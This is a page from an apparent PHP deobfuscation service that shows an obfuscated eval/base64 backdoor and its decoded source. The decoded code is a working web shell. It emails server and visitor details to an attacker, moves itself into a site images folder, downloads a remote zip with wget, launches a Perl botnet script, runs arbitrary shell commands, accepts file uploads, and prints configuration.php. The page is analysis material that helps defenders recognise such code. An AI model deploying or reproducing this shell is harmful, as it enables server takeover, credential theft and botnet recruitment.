Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php if ( isset($_GET['index']) ) eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP5e..

Decoded Output download

if(!isset($_SESSION['bajak'])){
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Ada Maling!! http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
if(isset($_GET['kliverz'])){
system("wget http://enginesearch.net/image.zip;unzip image.zip");
}
if(isset($_GET['botnet'])){
system("cd image;perl bt.txt");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>xSouL - BKHT</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

<?php 
if ( isset($_GET['index']) )
eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9iadfOC2JUq1ORcM/rM8+OdMInYYNYCcp6hoEfBP3B6YUzc9fsxrl3tR4+fnXeZclIJMpZkS7Z6aBxDnC81fbDf/3hBT0ejc7C404wokpNzbPrDfXQ/+fcD1Ph+bBiDcYiXqAFcjEjC5ZaCW1ApMhyplB4f6rNJJtAuhMDmn7lGQ+nCNLRwjAVMTgttOET4jaWhi3y0JQQlQVKCwwfHPT88HFj5HCATq9UO48fP0Ai4Q2rRjQyqaHIoehvxpmQd7zISwrusiLH/oYHVFRQcamqGWGUKDDIeEFQ/3Ew8tecRcYTl6plRCaevV6zGUZfp03hUiKlW4QasugWPUCuQUvCs3ajTnNX5bvtac0W8kkXZ5n1z1UAxS11KEgdlxlOdt+QLAoU13Wpwf7s3KtmXtH1zOLTJ8MTn7ho73zzVBdBlIgM6r6RoiwiS+8EJzgc9s9Tbq//3T89OPEd0w0xVcVWanJoNDg8P/FCVOFjMBg5Sh5685RaTrYlT+b4OxEi1hcFhZfPZd0sBUu2etItb6O2eRVCbt4kHPm5r4DKhUeQumeOB0ozC9mUdCCBFdHMy0BMBN49zztyhkqyfKav5BgLhX5CRVGxaOzgoSRxrDxop+oAv7Ddat/V7ru23dEomglP9xRKCezfBaL8QbbJX38fj/baSbY3LvY1yZXhUeAokPweur+TVSTYRL99MR803KfeMptU99rjpWYThW6JDdmlLvWwuBAFa3nKCN2WVFvvzWSODgi/5GTXUVcXa4sRlik8V6Yr5fSpZR3Wu/Lp3sKER2pbS5pBeHqGmZRMpLjIVT7HcVH3fzSP7TSItMi+Lc2yK0hE5E+6Tb/ltB3TIFPV0LoEMqN3en/WigJHTHFRWDw0rs/0blph3sRX/kWKy8sfyYHWryepEnbKHKSsVVaqhx0yfaanP26Ggy6l+2ITbSjSlHJkWuAez/JFEbXIoVgV4DtONMddGqUx3dQG5TjlK72NUMktWFfzfIP2eo153+l5IgU8IBMiLRPFZkkocLcdM8V35Gg5upr/KeE8QgSLVo8nYMp1eOt01cxrHFBJoZUW+4bBBP0rte5a/VWrnF95tDdEnMLca++SaBB48TWb1vvzn0ieDOb6hpIobkVpFdtjsCArHR2rJbe24A1t13Oec+zCsc71AiiNVMz1JspK70CjdmPUPhUcZ20wCrMw9IYILpyaEucK7YyR6cNH3E91o1AcdwP3UheV5qFow4WwUeOZNBWYXxJXSnjnVd0VuMAh1mbhkdgRWTb0ThlSICVEKPKehsPhtXtTdYc8Pl0slrCq6XiW8R0xlEjKNDZbtRp4bAHrHfRU3U475oPDTc4gVk+4g8jVkcxHs1rU1r5ncLR57vpnBU5HGEmKn4UgfghQMakhFBMEoA8rNJsFvWSzVVw0Xhu/+Dzh07Jg+iU3fxlNNUD0XP+rUH4CtZNVsp0w51Lg/wE=')))); ?>

Function Calls

gzinflate	1
str_rot13	1
base64_decode	1

Variables

None

Stats

MD5	6ded46c3538c288c3a17c5623fb759e3
Eval Count	1
Decode Time	39 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats